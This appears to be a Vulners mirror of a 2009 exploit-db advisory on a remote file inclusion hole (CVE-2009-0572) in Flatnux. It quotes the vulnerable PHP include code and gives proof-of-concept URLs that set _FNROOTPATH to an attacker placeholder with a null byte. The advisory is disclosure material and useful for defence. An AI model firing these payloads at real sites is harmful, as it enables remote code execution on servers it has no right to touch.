Lucene search
+L

Flatnux 2009-01-27 - Remote File Inclusion

🗓️ 03 Feb 2009 00:00:00Reported by Alfons LujaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Flatnux 2009-01-27 Remote File Inclusion vulnerability in include/theme.php and /filemanager.ph

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-0572
3 Feb 200900:00
circl
cve
CVE
CVE-2009-0572
13 Feb 200917:00
cve
cvelist
Cvelist
CVE-2009-0572
13 Feb 200917:00
cvelist
euvd
EUVD
EUVD-2009-0576
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0572
13 Feb 200917:30
nvd
prion
Prion
Remote file inclusion
13 Feb 200917:30
prion
@ flatnux Flatnux-2009-01-27 RFI
  zależności P
  + Alfons Luja
  + 2009
  + grts : All friends


  VULN :
       +++ include/theme.php
         ...
        <?php
          if (eregi("theme.php", $_SERVER['PHP_SELF']))
	     die();                         // 0 <-- I dont give a fuck


             global $theme, $_FNROOTPATH,$lang;   //<-- 1
             global $forumback, $forumborder;
             $_FN['table_background']=&$forumback;
             $_FN['table_border']=&$forumborder;


             if ($forumback=="" && $forumborder==""){
	        $forumback="ffffff";
	        $forumborder="000000";
                }
                require_once ($_FNROOTPATH . "themes/$theme/theme.php");

             /*------- Funzioni ridefinibili da theme.php--------------*/
         //......
      +++ /flatnux.php line 116:

           //$_FNROOTPATH Still dont have value
           include_once "./include/theme.php";   //-- 2

      +++ /filemanager.php
          include "./include/flatnux.php"; // -- RFI

  p0c:
     http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00
     http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO
     ... itd ...

  --http://www.wrzuta.pl/audio/xLyg0zckZS/--
  #EŁOF lol

# milw0rm.com [2009-02-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25.1
EPSS0.06337
33